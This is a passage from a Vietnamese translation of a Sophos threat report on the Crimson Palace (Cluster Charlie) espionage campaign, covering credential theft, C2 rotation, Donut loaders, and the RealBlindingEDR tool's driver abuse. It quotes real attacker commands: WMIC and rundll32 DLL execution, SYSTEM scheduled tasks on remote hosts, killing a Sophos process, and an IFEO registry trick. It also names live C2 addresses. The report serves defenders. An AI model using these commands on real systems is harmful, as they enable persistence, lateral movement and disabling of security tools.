\/user:&#8221;&lt;REDACTED&gt;&#8221; process call create &#8220;cmd \/c C:\\Windows\\syswow64\\rundll32.exe C:\\windows\\syswow64\\Windows.Data.Devices.Config.dll,Start&#8221;<\/p>\n\n\n\n<p>Sau \u0111\u00f3, k\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng th\u00f4ng tin x\u00e1c th\u1ef1c \u0111\u1ec3 truy c\u1eadp v\u00e0o m\u1ed9t trong c\u00e1c ch\u01b0\u01a1ng tr\u00ecnh qu\u1ea3n l\u00fd si\u00eau gi\u00e1m s\u00e1t c\u1ee7a t\u1ed5 ch\u1ee9c v\u00e0 t\u1ea1o m\u1ed9t t\u00e1c v\u1ee5 theo l\u1ecbch tr\u00ecnh, th\u1ef1c thi m\u1ed9t DLL \u0111\u1ed9c h\u1ea1i kh\u00e1c ng\u1ee5y trang th\u00e0nh t\u1ec7p .ini \u0111\u1ec3 k\u1ebft n\u1ed1i v\u1edbi c\u00f9ng m\u1ed9t IP C2 b\u00ean ngo\u00e0i nh\u01b0 IP ng\u1ee5y trang th\u00e0nh t\u1ec7p PDF.&nbsp;<\/p>\n\n\n\n<p>schtasks \/create \/tn \\Microsoft\\Windows\\Clip2 \/tr &#8220;rundll32 C:\\programdata\\vmnat\\Test\\log.ini,Start&#8221; \/ru System \/sc minute \/mo 90 \/f&nbsp;<\/p>\n\n\n\n<p>T\u00e1c v\u1ee5 theo l\u1ecbch tr\u00ecnh n\u00e0y cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng th\u1ef1c hi\u1ec7n m\u1ed9t b\u01b0\u1edbc chuy\u1ec3n kh\u00e1c t\u1eeb tr\u00ecnh qu\u1ea3n l\u00fd \u1ea3o sang h\u1ec7 th\u1ed1ng kh\u00e1c \u0111\u1ec3 th\u1ef1c thi SharpHound, b\u1eb1ng c\u00e1ch s\u1eed d\u1ee5ng t\u00e0i kho\u1ea3n qu\u1ea3n tr\u1ecb tr\u01b0\u1edbc \u0111\u00f3 \u0111\u01b0\u1ee3c li\u00ean k\u1ebft v\u1edbi Cluster Charlie.&nbsp;&nbsp;<\/p>\n\n\n\n<p>\/c schtasks \/create \/s 172.xx.xxx.xxx \/p &#8220;&lt;REDACTED&gt;&#8221; \/u &#8220;&lt;REDACTED&gt;&#8221; \/tn \\Microsoft\\Windows\\Clip2 \/tr &#8220;C:\\Windows\\syswow64\\rundll32.exe C:\\windows\\syswow64\\Windows.Data.Devices.Config.dll,Start&#8221; \/ru System \/sc minute \/mo 90 \/f&nbsp;<\/p>\n\n\n\n<p><strong>Th\u00e1ng 12 n\u0103m 2023: Thu th\u1eadp v\u00e0 l\u1ecdc&nbsp;<\/strong><\/p>\n\n\n\n<p>V\u00e0o th\u00e1ng 12, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 ti\u1ebfn h\u00e0nh m\u1ed9t lo\u1ea1t c\u00e1c n\u1ed7 l\u1ef1c do th\u00e1m v\u00e0 thu th\u1eadp. \u0110i\u1ec1u n\u00e0y bao g\u1ed3m vi\u1ec7c thu th\u1eadp th\u00f4ng tin \u0111\u0103ng nh\u1eadp v\u00e0 d\u1eef li\u1ec7u c\u1ee7a qu\u1ea3n tr\u1ecb vi\u00ean cho nh\u1eefng ng\u01b0\u1eddi d\u00f9ng c\u1ee5 th\u1ec3, c\u0169ng nh\u01b0 ping c\u00e1c t\u00e0i kho\u1ea3n ng\u01b0\u1eddi d\u00f9ng v\u00e0 m\u00e1y m\u00e0 ch\u00fang t\u00f4i quan s\u00e1t th\u1ea5y nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng do th\u00e1m trong&nbsp;&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#c-discovery\">ho\u1ea1t \u0111\u1ed9ng Cluster Charlie tr\u01b0\u1edbc \u0111\u00f3 v\u00e0o th\u00e1ng 6 n\u0103m 2023.<\/a>&nbsp;Trong th\u1eddi gian n\u00e0y, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 ti\u1ebfn h\u00e0nh ho\u1ea1t \u0111\u1ed9ng gi\u00e1n \u0111i\u1ec7p c\u00f3 m\u1ee5c ti\u00eau, trong \u0111\u00f3 ch\u00fang thu th\u1eadp c\u00e1c t\u00e0i li\u1ec7u nh\u1ea1y c\u1ea3m, kh\u00f3a cho c\u01a1 s\u1edf h\u1ea1 t\u1ea7ng \u0111\u00e1m m\u00e2y (bao g\u1ed3m ph\u1ee5c h\u1ed3i sau th\u1ea3m h\u1ecda v\u00e0 sao l\u01b0u), c\u00e1c kh\u00f3a v\u00e0 ch\u1ee9ng ch\u1ec9 x\u00e1c th\u1ef1c quan tr\u1ecdng kh\u00e1c v\u00e0 d\u1eef li\u1ec7u c\u1ea5u h\u00ecnh cho ph\u1ea7n l\u1edbn c\u01a1 s\u1edf h\u1ea1 t\u1ea7ng CNTT v\u00e0 m\u1ea1ng c\u1ee7a c\u01a1 quan.&nbsp;&nbsp;<\/p>\n\n\n\n<p><strong>2024: T\u0103ng t\u1ed1c&nbsp;<\/strong><\/p>\n\n\n\n<p>&nbsp;V\u00e0o n\u0103m 2024, r\u00f5 r\u00e0ng l\u00e0 c\u00e1c t\u00e1c nh\u00e2n \u0111e d\u1ecda \u0111\u00e3 b\u1eaft \u0111\u1ea7u nhanh ch\u00f3ng lu\u00e2n chuy\u1ec3n qua c\u00e1c k\u00eanh C2 \u0111\u1ec3 duy tr\u00ec v\u00e0 qu\u1ea3n l\u00fd quy\u1ec1n truy c\u1eadp li\u00ean t\u1ee5c khi Sophos ph\u00e1t hi\u1ec7n v\u00e0 ch\u1eb7n c\u00e1c c\u1ea5y gh\u00e9p C2 hi\u1ec7n c\u00f3. Ch\u00fang c\u0169ng thay \u0111\u1ed5i c\u00e1ch tri\u1ec3n khai c\u00e1c t\u1ea3i tr\u1ecdng \u0111\u1ed9c h\u1ea1i. T\u1eeb th\u00e1ng 11 n\u0103m 2023 \u0111\u1ebfn \u00edt nh\u1ea5t l\u00e0 th\u00e1ng 5 n\u0103m 2024, c\u00e1c t\u00e1c nh\u00e2n trong Cluster Charlie \u0111\u00e3 tri\u1ec3n khai c\u00e1c c\u1ea5y gh\u00e9p C2 b\u1eb1ng 28 t\u1ed5 h\u1ee3p duy nh\u1ea5t c\u1ee7a chu\u1ed7i t\u1ea3i ph\u1ee5, ph\u01b0\u01a1ng ph\u00e1p th\u1ef1c thi v\u00e0 tr\u00ecnh t\u1ea3i shellcode.&nbsp;&nbsp;<\/p>\n\n\n\n<p>C\u00f3 ba l\u00fd do khi\u1ebfn c\u00e1c di\u1ec5n vi\u00ean nhanh ch\u00f3ng lu\u00e2n chuy\u1ec3n k\u00eanh C2 v\u00e0 ph\u01b0\u01a1ng ph\u00e1p tri\u1ec3n khai c\u1ee7a h\u1ecd:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>C\u00f3 b\u1eb1ng ch\u1ee9ng cho th\u1ea5y nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111ang th\u1eed nghi\u1ec7m \u0111\u1ec3 xem li\u1ec7u Sophos c\u00f3 ph\u00e1t hi\u1ec7n ra c\u00e1c t\u1ec7p v\u00e0 ph\u01b0\u01a1ng ph\u00e1p tri\u1ec3n khai kh\u00e1c nhau hay kh\u00f4ng.&nbsp;&nbsp;<\/li>\n\n\n\n<li>C\u00e1c k\u00eanh C2 xoay v\u00f2ng nhanh ch\u00f3ng v\u00e0 ph\u01b0\u01a1ng ph\u00e1p tri\u1ec3n khai c\u00f3 th\u1ec3 khi\u1ebfn b\u00ean ph\u00f2ng th\u1ee7 kh\u00f3 theo k\u1ecbp v\u00e0 ng\u0103n ch\u1eb7n h\u01a1n.&nbsp;&nbsp;<\/li>\n\n\n\n<li>Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 ph\u1ea3n h\u1ed3i l\u1ea1i h\u00e0nh \u0111\u1ed9ng ch\u1eb7n c\u1ee7a ch\u00fang t\u00f4i, \u0111\u00f4i khi thi\u1ebft l\u1eadp l\u1ea1i quy\u1ec1n truy c\u1eadp trong v\u00f2ng 24 gi\u1edd v\u00e0 tri\u1ec3n khai m\u1ed9t m\u1eabu duy nh\u1ea5t \u0111\u00e3 \u0111\u01b0\u1ee3c s\u1eeda \u0111\u1ed5i trong v\u00f2ng ch\u01b0a \u0111\u1ea7y b\u1ed1n ng\u00e0y \u0111\u1ec3 tr\u00e1nh b\u1ecb ph\u00e1t hi\u1ec7n ch\u1eb7n.&nbsp;<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/aws.vacif.com\/wp-content\/uploads\/sites\/3\/2024\/09\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi-4-1024x577.png\" alt=\"\" class=\"wp-image-20415\"\/><figcaption class=\"wp-element-caption\"><em>H\u00ecnh 4: Ho\u1ea1t \u0111\u1ed9ng \u0111e d\u1ecda li\u00ean t\u1ee5c trong n\u0103m 2024<\/em><\/figcaption><\/figure>\n\n\n\n<p>V\u00e0o th\u00e1ng 1, ch\u00fang t\u00f4i \u0111\u00e3 th\u1ea5y th\u00eam nhi\u1ec1u v\u1ee5 thu th\u1eadp c\u00f3 ch\u1ee7 \u0111\u00edch c\u00e1c t\u00e0i li\u1ec7u c\u1ee7a ng\u01b0\u1eddi d\u00f9ng v\u00e0 c\u01a1 s\u1edf d\u1eef li\u1ec7u truy\u1ec1n th\u00f4ng Viber for Desktop, thu th\u1eadp c\u00e1c cu\u1ed9c tr\u00f2 chuy\u1ec7n n\u1ed9i b\u1ed9 t\u1ea1i t\u1ed5 ch\u1ee9c. Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng c\u0169ng \u0111\u00e3 th\u1ef1c hi\u1ec7n c\u00e1c bi\u1ec7n ph\u00e1p \u0111\u1ec3 v\u00f4 hi\u1ec7u h\u00f3a ph\u1ea7n m\u1ec1m b\u1ea3o v\u1ec7 \u0111i\u1ec3m cu\u1ed1i ho\u1eb7c tr\u1ed1n tr\u00e1nh ph\u00e1t hi\u1ec7n khi kh\u00f4ng th\u1ec3 v\u00f4 hi\u1ec7u h\u00f3a ph\u1ea7n m\u1ec1m.&nbsp;<\/p>\n\n\n\n<p><strong>Th\u00e1ng 1 n\u0103m 2024: RealBlindingEDR&nbsp;<\/strong><\/p>\n\n\n\n<p>V\u00e0o th\u00e1ng 1 n\u0103m 2024, Sophos MDR \u0111\u00e3 quan s\u00e1t th\u1ea5y c\u00e1c t\u00e1c nh\u00e2n tri\u1ec3n khai hai m\u1eabu&nbsp;<a href=\"https:\/\/github.com\/myzxcg\/RealBlindingEDR\">RealBlindingEDR<\/a>&nbsp;\u0111\u00e3 \u0111\u01b0\u1ee3c s\u1eeda \u0111\u1ed5i \u0111\u00f4i ch\u00fat , m\u1ed9t c\u00f4ng c\u1ee5 ngu\u1ed3n m\u1edf \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf \u0111\u1ec3 &#8220;l\u00e0m m\u00f9&#8221; (ho\u1eb7c gi\u1ebft ch\u1ebft) c\u00e1c gi\u1ea3i ph\u00e1p b\u1ea3o v\u1ec7 ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i v\u00e0 ph\u00e1t hi\u1ec7n v\u00e0 ph\u1ea3n h\u1ed3i \u0111i\u1ec3m cu\u1ed1i (EDR). Tr\u1edb tr\u00eau thay, c\u00e1c t\u00e1c nh\u00e2n&nbsp;\u0111\u00e3&nbsp;s\u1eed d\u1ee5ng&nbsp;m\u1ed9t s\u1ea3n ph\u1ea9m b\u1ea3o v\u1ec7 ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i&nbsp;\u0111\u1ec3 th\u1ef1c thi tr\u00ecnh di\u1ec7t EDR nh\u1eb1m t\u1ea1o ra m\u1ed9t chu\u1ed7i th\u1ef1c thi c\u00f3 v\u1ebb &#8220;an to\u00e0n&#8221; \u0111\u1ed1i v\u1edbi c\u00e1c c\u00f4ng c\u1ee5 b\u1ea3o v\u1ec7 ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i kh\u00e1c, t\u01b0\u01a1ng t\u1ef1 nh\u01b0 c\u00e1ch ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i &#8220;tr\u00ecnh di\u1ec7t EDR&#8221; tr\u01b0\u1edbc \u0111\u00e2y \u0111\u00e3&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2023\/04\/19\/aukill-edr-killer-malware-abuses-process-explorer-driver\/\">s\u1eed d\u1ee5ng c\u00e1c th\u00e0nh ph\u1ea7n Windows \u0111\u00e1ng tin c\u1eady<\/a>&nbsp;.&nbsp;&nbsp;<\/p>\n\n\n\n<p>\u0110\u1ec3 minh h\u1ecda c\u00e1ch chu\u1ed7i t\u1ea5n c\u00f4ng tr\u1edf n\u00ean ph\u1ee9c t\u1ea1p h\u01a1n, sau \u0111\u00e2y l\u00e0 c\u00e1ch k\u1ebb t\u1ea5n c\u00f4ng ph\u00e1t h\u00e0nh t\u1ec7p nh\u1ecb ph\u00e2n RealBlindingEDR asoc.exe:.&nbsp;<\/p>\n\n\n\n<p>\u0110\u1ea7u ti\u00ean, k\u1ebb t\u1ea5n c\u00f4ng ch\u1ea1y m\u1ed9t t\u1ec7p l\u1ec7nh h\u00e0ng lo\u1ea1t (33.bat) th\u1ef1c thi l\u1ec7nh sau:&nbsp;&nbsp;<\/p>\n\n\n\n<p>cd c:\\ProgramData &amp;&amp; c:\\ProgramData\\kaba.exe ch\u1ea1y run-cmd &#8220;c:\\ProgramData\\asoc.exe -cccc&#8221;&nbsp;<\/p>\n\n\n\n<p>L\u1ec7nh n\u00e0y s\u1eed d\u1ee5ng kaba.exe, phi\u00ean b\u1ea3n \u0111\u1ed5i t\u00ean c\u1ee7a t\u1ec7p th\u1ef1c thi Kaspersky h\u1ee3p l\u1ec7, \u0111\u1ec3 t\u1ea3i m\u1eabu RealBlindingEDR, asoc.exe.&nbsp;<\/p>\n\n\n\n<p>Sau khi th\u1ef1c thi, \u0111\u1ea7u ti\u00ean asoc.exe s\u1ebd c\u1ed1 g\u1eafng ki\u1ec3m tra xem tr\u00ecnh \u0111i\u1ec1u khi\u1ec3n echo \u0111\u00e3 \u0111\u01b0\u1ee3c t\u1ea3i ch\u01b0a. N\u1ebfu ch\u01b0a, n\u00f3 s\u1ebd c\u1ed1 g\u1eafng t\u1ea3i tr\u00ecnh \u0111i\u1ec1u khi\u1ec3n ProgramData\\mico.sys (phi\u00ean b\u1ea3n \u0111\u1ed5i t\u00ean c\u1ee7a echo_driver.sys \u0111\u01b0\u1ee3c tri\u1ec3n khai nh\u01b0 m\u1ed9t ph\u1ea7n c\u1ee7a b\u1ed9 c\u00f4ng c\u1ee5 RealBlindingEDR) v\u00e0 l\u1ea5y x\u1eed l\u00fd c\u1ee7a n\u00f3. C\u00e1c t\u1ec7p nh\u1ecb ph\u00e2n khai th\u00e1c&nbsp;<a href=\"https:\/\/ioctl.fail\/echo-ac-writeup\/\">l\u1ed7 h\u1ed5ng trong c\u00f4ng c\u1ee5 ch\u1ed1ng gian l\u1eadn cho Minecraft c\u00f3 t\u00ean l\u00e0 Echo.ac<\/a>&nbsp;(CVE-2023-38817) v\u00e0 s\u1eed d\u1ee5ng c\u00f4ng c\u1ee5 \u0111\u00f3 \u0111\u1ec3&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2022\/10\/04\/blackbyte-ransomware-returns\/\">x\u00f3a c\u00e1c th\u00f3i quen h\u1ea1t nh\u00e2n<\/a>&nbsp;\u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng b\u1edfi m\u1ed9t s\u1ed1 s\u1ea3n ph\u1ea9m EDR kh\u00e1c nhau, cho ph\u00e9p c\u00e1c t\u00e1c nh\u00e2n leo thang \u0111\u1eb7c quy\u1ec1n c\u1ee7a ch\u00fang th\u00f4ng qua h\u00e0nh vi tr\u1ed9m c\u1eafp m\u00e3 th\u00f4ng b\u00e1o. Echo.ac \u0111\u00e3 \u0111\u01b0\u1ee3c tri\u1ec3n khai trong tr\u01b0\u1eddng h\u1ee3p n\u00e0y v\u00e0 c\u00e1c tr\u01b0\u1eddng h\u1ee3p kh\u00e1c d\u01b0\u1edbi d\u1ea1ng mico.sys. Sau \u0111\u00f3, cu\u1ed9c t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng c\u00f9ng m\u1ed9t k\u1ef9 thu\u1eadt \u0111\u1ec3 x\u00f3a c\u00e1c l\u1ec7nh g\u1ecdi l\u1ea1i h\u1ea1t nh\u00e2n CmRegisterCallbacks v\u00e0 MiniFilterCallbacks, c\u1ea3 hai \u0111\u1ec1u l\u00e0 c\u00e1c h\u00e0m h\u1ea1t nh\u00e2n m\u00e0 nhi\u1ec1u s\u1ea3n ph\u1ea9m EDR s\u1eed d\u1ee5ng \u0111\u1ec3 gi\u00e1m s\u00e1t ho\u1ea1t \u0111\u1ed9ng c\u1ee7a h\u1ec7 th\u1ed1ng.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Sau khi RealBlindingEDR x\u00f3a c\u00e1c ch\u01b0\u01a1ng tr\u00ecnh kernel n\u00e0y kh\u1ecfi b\u1ed9 nh\u1edb, n\u00f3 s\u1ebd d\u1ee1 t\u1ea3i tr\u00ecnh \u0111i\u1ec1u khi\u1ec3n Echo.ac (mico.sys) v\u00e0 ch\u1ea1y<\/p>\n\n\n\n<p>taskkill \/IM SophosFileScanner.exe \/F<\/p>\n\n\n\n<p>\u0111\u1ec3 gi\u1ebft ti\u1ebfn tr\u00ecnh SophosFileScanner.exe. \u0110\u1ec3 b\u00e1o hi\u1ec7u thao t\u00e1c th\u00e0nh c\u00f4ng, c\u00e1c t\u1ec7p nh\u1ecb ph\u00e2n s\u1ebd t\u1ea1o m\u1ed9t t\u1ec7p tr\u1ed1ng trong C:\\Users\\Public\\log.ini. S\u1ef1 hi\u1ec7n di\u1ec7n c\u1ee7a t\u1ec7p n\u00e0y cho bi\u1ebft th\u00e0nh c\u00f4ng.&nbsp;<\/p>\n\n\n\n<p>M\u1ed9t m\u1eabu RealBlindingEDR kh\u00e1c \u0111\u01b0\u1ee3c ph\u00e1t hi\u1ec7n, ssoc.exe, c\u00f3 m\u1ed9t kh\u1ea3 n\u0103ng b\u1ed5 sung: N\u00f3 s\u1eed d\u1ee5ng m\u1ed9t&nbsp;<a href=\"https:\/\/www.trendmicro.com\/de_de\/research\/23\/e\/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html\">k\u1ef9 thu\u1eadt \u0111\u00e3 bi\u1ebft<\/a>&nbsp;\u0111\u1ec3 c\u1ed1 g\u1eafng l\u00e0m s\u1eadp c\u00e1c quy tr\u00ecnh EDR, b\u1eb1ng c\u00e1ch t\u1ea1o m\u1ed9t kh\u00f3a Registry c\u00f3 t\u00ean l\u00e0 SophosFileScanner.exe trong \u0111\u01b0\u1eddng d\u1eabn SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\, v\u00e0 t\u1ea1o m\u1ed9t gi\u00e1 tr\u1ecb chu\u1ed7i c\u00f3 t\u00ean l\u00e0 MinimumStackCommitInBytes b\u00ean trong kh\u00f3a \u0111\u00f3.&nbsp;<\/p>\n\n\n\n<p>Sophos c\u0169ng quan s\u00e1t th\u1ea5y n\u1ed7 l\u1ef1c c\u1ee7a c\u00e1c t\u00e1c nh\u00e2n nh\u1eb1m s\u1eed d\u1ee5ng m\u1ed9t c\u00f4ng c\u1ee5 m\u00e3 ngu\u1ed3n m\u1edf c\u00f3 t\u00ean l\u00e0&nbsp;<a href=\"https:\/\/github.com\/weak1337\/Alcatraz\">Alcatraz<\/a>&nbsp;, \u0111\u00e2y l\u00e0 m\u1ed9t tr\u00ecnh m\u00e3 h\u00f3a nh\u1ecb ph\u00e2n x64. T\u1eeb th\u00e1ng 2 \u0111\u1ebfn th\u00e1ng 5, c\u00f4ng c\u1ee5 n\u00e0y \u0111\u00e3 b\u1ecb ph\u00e1t hi\u1ec7n (d\u01b0\u1edbi d\u1ea1ng ATK\/Alcatraz-D) t\u1ea1i v\u1ecb tr\u00ed C:\\ProgramData\\conhost.exe v\u00e0 b\u1ecb Sophos ng\u0103n kh\u00f4ng cho ch\u1ea1y trong b\u1ed1n l\u1ea7n ri\u00eang bi\u1ec7t.&nbsp;<\/p>\n\n\n\n<p><strong>Th\u00e1ng 2 n\u0103m 2024: Ki\u1ec3m tra chi\u1ebfn thu\u1eadt v\u00e0 c\u00f4ng c\u1ee5&nbsp;<\/strong><\/p>\n\n\n\n<p>Sau khi Sophos m\u1edf r\u1ed9ng ph\u1ea1m vi ph\u00e1t hi\u1ec7n c\u1ee7a khung Havoc C2, t\u00e1c nh\u00e2n \u0111e d\u1ecda b\u1eaft \u0111\u1ea7u nhanh ch\u00f3ng tu\u1ea7n ho\u00e0n qua m\u1ed9t s\u1ed1 t\u00f9y ch\u1ecdn c\u1ea5y gh\u00e9p C2. Ch\u00fang tri\u1ec3n khai&nbsp;<a href=\"https:\/\/github.com\/INotGreen\/XiebroC2\">khung XieBroC2<\/a>&nbsp;l\u00e0m b\u1ea3n sao l\u01b0u. \u0110\u1ed3ng th\u1eddi, c\u00e1c t\u00e1c nh\u00e2n d\u01b0\u1eddng nh\u01b0 \u0111ang ch\u1ebf t\u1ea1o l\u1ea1i c\u01a1 ch\u1ebf tri\u1ec3n khai c\u1ee7a ch\u00fang.&nbsp;<\/p>\n\n\n\n<p>M\u1ed9t trong nh\u1eefng c\u01a1 ch\u1ebf m\u00e0 h\u1ecd chuy\u1ec3n sang l\u00e0&nbsp;<a href=\"https:\/\/github.com\/TheWover\/donut\">Donut<\/a>&nbsp;, m\u1ed9t c\u00f4ng c\u1ee5 m\u00e3 ngu\u1ed3n m\u1edf t\u1ea1o ra c\u00e1c t\u1eadp l\u1ec7nh ti\u00eam shellcode \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf \u0111\u1ec3 tr\u00e1nh c\u00e1c c\u00f4ng c\u1ee5 b\u1ea3o m\u1eadt. Donut c\u00f3 th\u1ec3 t\u1ea3i m\u1ed9t payload \u0111\u1ed9c h\u1ea1i t\u1eeb b\u1ed9 nh\u1edb v\u00e0 ti\u00eam n\u00f3 v\u00e0o c\u00e1c quy tr\u00ecnh Windows t\u00f9y \u00fd. C\u00e1c t\u00e1c nh\u00e2n \u0111e d\u1ecda \u0111\u00e3 \u0111\u01b0\u1ee3c quan s\u00e1t th\u1ea5y nhi\u1ec1u l\u1ea7n s\u1eed d\u1ee5ng tr\u00ecnh t\u1ea3i d\u1ef1a tr\u00ean Donut \u0111\u1ec3 th\u1ea3 c\u00e1c c\u1ea5y gh\u00e9p C2, th\u01b0\u1eddng xuy\u00ean th\u1ea3 c\u00e1c bi\u1ebfn th\u1ec3 c\u1ee7a c\u00e1c c\u1ea5y gh\u00e9p trong v\u00f2ng v\u00e0i gi\u1edd tr\u00ean c\u00e1c m\u00e1y ch\u1ee7 kh\u00e1c nhau.&nbsp;<\/p>\n\n\n\n<p>V\u00e0o ng\u00e0y 1 th\u00e1ng 2, c\u00e1c di\u1ec5n vi\u00ean d\u01b0\u1eddng nh\u01b0 \u0111\u00e3 ti\u1ebfn h\u00e0nh m\u1ed9t h\u00ecnh th\u1ee9c&nbsp;<a href=\"http:\/\/ttps\/en.wikipedia.org\/wiki\/A\/B_testing\">th\u1eed nghi\u1ec7m A\/B<\/a>&nbsp;ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i, tri\u1ec3n khai hai DLL \u0111\u1ed9c h\u1ea1i kh\u00e1c nhau c\u00f3 c\u00f9ng t\u00ean (msntlm.dll) trong v\u00f2ng hai gi\u1edd sau m\u1ed7i l\u1ea7n. C\u1ea3 hai DLL \u0111\u1ec1u li\u00ean h\u1ec7 v\u1edbi c\u00f9ng m\u1ed9t \u0111\u1ecba ch\u1ec9 C2 (&nbsp;141.136.44.219, c\u00f3 v\u1ecb tr\u00ed \u0111\u1ecba l\u00fd t\u1ea1i S\u00edp) t\u1ea1i t\u00ean mi\u1ec1n gsenergyspeedtest.com, tr\u00f9ng kh\u1edbp v\u1edbi m\u1eabu \u0111\u1eb7t t\u00ean mi\u1ec1n \u0111\u01b0\u1ee3c&nbsp;<a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/k\/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html\">nh\u00f3m ph\u1ee5 Earth Longzhi<\/a>&nbsp;v\u00e0 Cluster Charlie c\u1ee7a APT 41 s\u1eed d\u1ee5ng trong ho\u1ea1t \u0111\u1ed9ng tr\u01b0\u1edbc \u0111\u00f3.&nbsp;<\/p>\n\n\n\n<p>C\u1ea3 hai DLL ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i \u0111\u1ec1u l\u00e0 tr\u00ecnh t\u1ea3i shellcode Donut. M\u1ed9t trong c\u00e1c m\u1eabu \u0111\u00e3 gi\u1ea3i m\u00e3 v\u00e0 \u0111\u01b0a Havoc Shellcode Dropper v\u00e0o svchost.exe, sau \u0111\u00f3 \u0111\u01b0a m\u1ed9t payload Havoc nh\u00fang v\u00e0o b\u1ed9 nh\u1edb v\u00e0 th\u1ef1c thi payload \u0111\u00f3. M\u1eabu c\u00f2n l\u1ea1i \u0111\u00e3 gi\u1ea3i m\u00e3 m\u1ed9t Havoc Shellcode Injector \u0111\u01b0a m\u1ed9t Cobalt Strike Reflective Loader v\u00e0o svchost.exe.&nbsp;&nbsp;<\/p>\n\n\n\n<p>V\u00e0o m\u1ed9t d\u1ecbp kh\u00e1c,&nbsp;27 ng\u00e0y&nbsp;sau l\u1ea7n th\u1eed nghi\u1ec7m A\/B ban \u0111\u1ea7u, ch\u00fang t\u00f4i \u0111\u00e3 quan s\u00e1t th\u1ea5y c\u00e1c t\u00e1c nh\u00e2n t\u1ea3i hai phi\u00ean b\u1ea3n c\u1ee7a m\u1ed9t t\u1ec7p \u0111\u1ed9c h\u1ea1i (libcef.dll) b\u1eb1ng c\u00e1ch l\u1ea1m d\u1ee5ng Java Chromium Embedded Framework Helper h\u1ee3p ph\u00e1p (jcef_helper.exe). M\u1ed9t m\u1eabu libcef.dll \u0111\u00e3 tri\u1ec3n khai XiebroC2 th\u00f4ng qua shellcode t\u1eeb&nbsp;Donut (k\u1ebft n\u1ed1i \u0111\u1ebfn 64.176.50.42:8444, \u0111\u01b0\u1ee3c \u0111\u1ecbnh v\u1ecb \u0111\u1ecba l\u00fd t\u1ea1i Hoa K\u1ef3)&nbsp;, trong khi m\u1eabu c\u00f2n l\u1ea1i tri\u1ec3n khai m\u1ed9t t\u1ea3i tr\u1ecdng Havoc \u0111\u01b0\u1ee3c m\u00e3 h\u00f3a \u0111\u01b0\u1ee3c nh\u00fang trong \u0111\u00f3, khi gi\u1ea3i m\u00e3 s\u1ebd ti\u1ebfp c\u1eadn \u0111\u1ebfn IP c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng l\u00e0 141.136.44.219 \u2014 c\u00f9ng m\u1ed9t \u0111\u1ecba ch\u1ec9 C2 t\u1ea1i S\u00edp \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng trong s\u1ef1 c\u1ed1 ng\u00e0y 1 th\u00e1ng 2.&nbsp;&nbsp;<\/p>\n\n\n\n<p>T\u1ed5ng c\u1ed9ng, trong th\u00e1ng 2 v\u00e0 th\u00e1ng 3 n\u0103m 2024, ch\u00fang t\u00f4i \u0111\u00e3 ch\u1ee9ng ki\u1ebfn \u200b\u200bb\u1ea3y l\u1ea7n tri\u1ec3n khai libcef.dll s\u1eed d\u1ee5ng jcef_helper.exe, trong m\u1ed9t s\u1ed1 tr\u01b0\u1eddng h\u1ee3p \u0111\u01b0\u1ee3c \u0111\u1ed5i t\u00ean th\u00e0nh C:\\PerfLogs\\conhost.exe v\u00e0 trong nh\u1eefng tr\u01b0\u1eddng h\u1ee3p kh\u00e1c kh\u00f4ng \u0111\u1ed5i t\u00ean.&nbsp;&nbsp;<\/p>\n\n\n\n<p><strong>Th\u00e1ng 2 v\u00e0 th\u00e1ng 3 n\u0103m 2024: Mang theo ng\u01b0\u1eddi tr\u1ee3 gi\u00fap&nbsp;<\/strong><\/p>\n\n\n\n<p>Nhi\u1ec1u l\u1ea7n, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 mang theo m\u1ed9t t\u1ec7p th\u1ef1c thi d\u1ec5 b\u1ecb t\u1ea5n c\u00f4ng \u0111\u1ec3 t\u1ea3i c\u00e1c t\u1ec7p DLL \u0111\u1ed9c h\u1ea1i. V\u00e0o th\u00e1ng 2, ch\u00fang \u0111\u00e3 mang theo t\u1ec7p \u0111\u1ed9c h\u1ea1i c:\\perflogs\\wsoc.exe v\u00e0 di chuy\u1ec3n t\u1ec7p n\u00e0y trong m\u00f4i tr\u01b0\u1eddng m\u1ee5c ti\u00eau \u0111\u1ec3 t\u1ea1o c\u00e1c quy tr\u00ecnh ti\u00eam m\u00e3 \u0111\u1ed9c. SophosLabs x\u00e1c \u0111\u1ecbnh wsoc.exe ho\u1ea1t \u0111\u1ed9ng b\u1eb1ng c\u00e1ch t\u1ea1o m\u1ed9t phi\u00ean b\u1ea3n c\u1ee7a Microsoft WMI Provider Subsystem Host \u0111\u1ec3 ch\u1ea1y WmiPrvse \u0111\u1ec3 sau \u0111\u00f3 c\u00f3 th\u1ec3 ti\u00eam m\u00e3 \u0111\u1ed9c v\u00e0o \u0111\u00f3. Trong 